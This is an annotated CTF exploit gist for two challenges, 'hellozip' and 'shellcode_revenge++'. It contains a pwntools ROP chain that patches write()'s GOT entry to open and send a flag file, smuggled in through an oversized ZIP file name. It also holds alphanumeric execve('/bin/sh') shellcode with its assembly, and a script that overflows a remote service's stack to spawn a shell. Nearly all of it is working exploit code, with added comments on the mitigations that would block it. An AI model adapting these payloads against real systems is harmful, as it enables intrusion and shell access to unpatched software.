Shellcode_revenge++, Hellozip
#!/usr/bin/env python
# coding=utf8
from pwn import p32, p16
# Gadget and symbol addresses for the hellozip challenge binary.  They are
# absolute 0x0804xxxx values packed with p32, i.e. a 32-bit target loaded at
# a fixed address (no PIE).  Every value is specific to that one build.
pop_2 = 0x8048F9A             # presumably pop; pop; ret (discards two slots)
pop_1 = 0x8048F9B             # the same gadget entered one byte later: pop; ret
# presumably `add byte [ebp+0x3d], bl`: every ebp value loaded for it below
# is written as <target> + 0x3d, i.e. the gadget's own displacement is 0x3d.
add_ptrebp_bl = 0x080488ac
pop_ebp = 0x08048898
pop_ebx = 0x080484a1
ret = 0x8048B87
readable_addr = ret           # any mapped address will do as a throwaway value
add_eax_ptrebx = 0x080492bb   # not used by the chain below
string_buf = 0x804B064        # writable scratch area where 'flag\0' is assembled
write_plt = 0x8048550         # call site: write@plt, which jumps through write_got
write_got = 0x804B030         # GOT slot of write(); patched in place below
# NOTE(review): the chain rewrites write()'s GOT entry in place with
# byte-wise adds, so it needs a writable GOT (the binary was not linked with
# full RELRO) and it hard-codes the low-byte distances write->open
# (0x80, 0xfc) and open->sendfile (0x50, 0x7b) of the server's libc.  Full
# RELRO or a different libc build breaks it.
rop_chain = (
    # I wrote an execve version of exp, but it *dropped EGID* in the server
    # whatever command it executed. Although it worked fine in my local
    # machine. I don't know why, it's really weird.
    # So I tried to do all the open-read-write stuffs in one ROP-chain.
    # The main goal is to open('flag', 0) and sendfile(1, 3, 0, 100)
    p32(pop_1) + p32(readable_addr) + # pop some corrupted stack
    # craft open() on write_got
    # I could just find the gadget to ADD byte by byte. It's add_ptrebp_bl, go
    # check about that.
    # Each triple below is: bl = value; ebp = target - 0x3d; [ebp+0x3d] += bl.
    p32(pop_ebx) + p32(0x80) +
    p32(pop_ebp) + p32(write_got + 0x3d) +
    p32(add_ptrebp_bl) +
    p32(pop_ebx) + p32(0xfc) +
    p32(pop_ebp) + p32(write_got + 1 + 0x3d) +
    p32(add_ptrebp_bl) +
    # prepare 'flag' string (string_buf is assumed to be zeroed beforehand,
    # otherwise the adds would not yield these exact bytes -- TODO confirm)
    p32(pop_ebx) + p32(ord('f')) +
    p32(pop_ebp) + p32(string_buf + 0x3d) +
    p32(add_ptrebp_bl) +
    p32(pop_ebx) + p32(ord('l')) +
    p32(pop_ebp) + p32(string_buf + 1 + 0x3d) +
    p32(add_ptrebp_bl) +
    p32(pop_ebx) + p32(ord('a')) +
    p32(pop_ebp) + p32(string_buf + 2 + 0x3d) +
    p32(add_ptrebp_bl) +
    p32(pop_ebx) + p32(ord('g')) +
    p32(pop_ebp) + p32(string_buf + 3 + 0x3d) +
    p32(add_ptrebp_bl) +
    p32(pop_ebx) + p32(ord('\x00')) +
    p32(pop_ebp) + p32(string_buf + 4 + 0x3d) +
    p32(add_ptrebp_bl) +
    # now open('flag', 0), and the returned file descriptor should be 3
    # (pop_2 is the return address: it discards the two arguments)
    p32(write_plt) + p32(pop_2) + p32(string_buf) + p32(0) +
    # craft sendfile() on write_got. FYI, it's open() in write_got now.
    p32(pop_ebx) + p32(0x50) +
    p32(pop_ebp) + p32(write_got + 0x3d) +
    p32(add_ptrebp_bl) +
    p32(pop_ebx) + p32(0x7b) +
    p32(pop_ebp) + p32(write_got + 1 + 0x3d) +
    p32(add_ptrebp_bl) +
    # maybe a carry bit will be triggered in previous operation, about
    # 50% possibility. It's okay to ignore that.
    # finally sendfile(1, 3, 0, 100); nothing runs after it, so the return
    # address slot is junk (0xdeadbeef)
    p32(write_plt) + p32(0xdeadbeef) + p32(1) + p32(3) + p32(0) + p32(100)
)
# 276 bytes of filler up to (presumably) the saved return address, then the
# gadget addresses.  NUL filler is fine here because the payload travels as a
# length-prefixed ZIP file name, not as a C string.
payload = '\x00' * 276 + rop_chain
# Create template.zip with:
# with ZipFile('template.zip', 'w') as f:
# f.write('emptyfile', 'a')
# i.e. a one-entry archive whose stored file is named 'a'.  The bytes below
# are that archive: local file header at 0x00, central-directory entry at
# 0x1f, end-of-central-directory record at 0x4e, 100 bytes in total.
template_zip_buf = '504b0304140000000000517a904b0000000000000000000000000100000061504b01021403140000000000517a904b000000000000000000000000010000000000000000000000a4810000000061504b050600000000010001002f0000001f0000000000'.decode('hex')   # Python 2 only
# Splice the payload in as the central-directory entry's file name:
#   [:0x3b]      local header + central-directory entry up to the name length
#   p16(len)     the entry's 2-byte file-name length, now len(payload)
#   [0x3d:0x4d]  the entry's remaining fixed fields (extra/comment lengths,
#                attributes, local-header offset) -- unchanged
#   payload      takes the place of the 1-byte name 'a'
#   [0x4e:]      end-of-central-directory record, left at the template's
#                sizes/offsets, so a strict parser would reject this archive
# Presumably the target copies the name with the length the archive claims
# rather than the size of its own buffer -- that is the bug class being hit;
# bounding the copy by the destination size is the fix on the parser side.
expzip_buf = \
template_zip_buf[:0x3b] + \
p16(len(payload)) + \
template_zip_buf[0x3d:0x4d] + \
payload + \
template_zip_buf[0x4e:]
# Python 2 str is bytes, so text mode is harmless on Linux; use 'wb' on Windows.
with open('exp.zip', 'w') as f:
    f.write(expzip_buf)
# Now scp exp.zip to the /tmp dir in server,
# and run 'cd /home/hellozip; ./hellozip < /tmp/exp.zip'
# Slightly modified from: https://www.exploit-db.com/exploits/35205/
# Assembled (56 bytes):
# h/A//XH5PQO/P^hj5XVX1Fm1FuH3FqPTj0X40PP4u4NZ4jWSEW18EF0V
#
# Assembly:
# user@host $ as binsh.s -o binsh.o ; strings binsh.o
#
# Reviewer notes (x86-64, AT&T syntax):
# - Every byte of the assembled output is printable ASCII -- the string above
#   *is* the machine code.  The real instructions (pop %rsi / pop %rdi /
#   syscall) and the "/bin/sh" string exist only after the xor decoding at
#   run time, so a static scan of the input for 0f 05 or "/bin/sh" does not
#   see them; detection has to look at behaviour (the execve) or at the
#   decoded bytes.
# - The decode offsets 0x6d/0x71/0x75 are relative to %rsi, which the first
#   three instructions set to 0x60107f.  With the code placed at 0x6010c0
#   (name_buf in the loader script below) that is 0x41 bytes below the code,
#   so 0x6d and 0x71 land on encoded_code (string index 44) and encoded_data
#   (index 48).  The offsets are +0x22 from the exploit-db original.  Any
#   other load address breaks the decoding, which is what PIE would provide.
.section .data
.section .text
.globl _start
_start:
push $0x2f2f412f # 'h/A//'
pop %rax # 'X'
xor $0x2f4f5150, %rax # 'H5PQO/' RAX becomes 0x60107f (0x2f2f412f ^ 0x2f4f5150). it's close to the buffer of 'name'. use it as the base of shellcode
push %rax # 'P'
pop %rsi # Make use of '^', AKA pop %rsi
prepare_key: # "hj5XVX"
# put the xor key into %eax
push $0x5658356a # 'hj5XV' pushed backwards because x86 stack.
pop %rax # 'X'
decode_encoded_code: # "1Fm"
# xor %eax, 0x4b(%rsi) # '1FK' -- the exploit-db original offset; +0x22 here to match this target's buffer
xor %eax, 0x6d(%rsi) # '1Fm' encoded_code ; pops & syscall decoded
decode_encoded_data: # "1FuH3Fq"
xor %eax, 0x75(%rsi) # '1Fu' encoded_data + 4 ; "/sh\0" decoded
xor 0x71(%rsi), %rax # 'H3Fq' encoded_data ; "/bin/sh\0" now in %rax (low dword decoded here, high dword was decoded above)
begin_stack_setup: # "PT"
push %rax # 'P' push "/bin/sh\0"
push %rsp # 'T' push pointer to /bin/sh
zero_rax: # "j0X40"
# xor %rax, %rax
push $0x30 # 'j0'
pop %rax # 'X'
xor $0x30, %al # '40' %rax is NULL
end_stack_setup: # "PP"
push %rax # 'P' push NULL
push %rax # 'P' push NULL
mov_3b_al: # "4u4N"
# mov $0x3b, %al
xor $0x75, %al # '4u'
xor $0x4e, %al # '4N' %al = 0x4e xor 0x75 = $0x3b
# this is for syscall ^
begin_stack_run: # "Z"
pop %rdx # 'Z' mov $0x00, %rdx ; %rdx = NULL
encoded_code: # "4jWS"
# 0x34 0x6a 0x57 0x53
# AFTER XOR MAGIC (each byte xor'ed with the key bytes 6a 35 58 56):
.byte 0x34 # "\x5e" pop %rsi ; %rsi = NULL
.byte 0x6a # "\x5f" pop %rdi ; %rdi = pointer to "/bin/sh\0"
.byte 0x57 # "\x0f"
.byte 0x53 # "\x05" syscall ; execve("/bin/sh\0",NULL,NULL);
# syscall(%rax) = function(%rdi,%rsi,%rdx);
# syscall(0x3b) = execve("/bin/sh\0",NULL,NULL);
encoded_data: # "EW18EF0V" turns into "/bin/sh\0"
# 0x45 0x57 0x31 0x38 0x45 0x46 0x30 0x56
# AFTER XOR MAGIC:
.byte 0x45 # /
.byte 0x57 # b
.byte 0x31 # i
.byte 0x38 # n
.byte 0x45 # /
.byte 0x46 # s
.byte 0x30 # h
.byte 0x56 # \0
#!/usr/bin/env python
# coding=utf8
from pwn import remote, process, p64, asm
# p = process('./shellcode_revenge++')   # local run against the challenge binary
p = remote('shellcode-revenge.grandprix.whitehatvn.com', 10203)   # the CTF's remote instance
# The 56-byte alphanumeric payload assembled from binsh.s above (see its
# "Assembled" comment).  Presumably the name input only accepts printable
# characters -- that is what the printable encoding works around.
shellcode = 'h/A//XH5PQO/P^hj5XVX1Fm1FuH3FqPTj0X40PP4u4NZ4jWSEW18EF0V'
# Pad to 80 bytes with 'G' (0x47).  In 64-bit mode that byte is a REX prefix,
# not a real 0x90 NOP; ljust puts it after the code, so it is only reached
# if the execve did not happen.
shellcode = shellcode.ljust(80, 'G') # append nop
print shellcode   # Python 2 print statement (the whole gist is Python 2)
name_buf = 0x6010C0   # fixed address of the name buffer in the non-PIE target
# 24 bytes of filler, then (presumably) the saved return address is replaced
# with the address of the name buffer, so the function returns into the bytes
# just sent.  That evidently relied on no stack canary sitting in the way and
# on the name buffer being executable (no NX); either mitigation alone would
# have stopped it.
payload = 'a' * 24 + p64(name_buf)
p.recvuntil('What\'s your name,')
p.send(shellcode)
p.recvuntil('messege for me!')   # the target's own prompt text (sic)
p.sendline(payload)
p.interactive()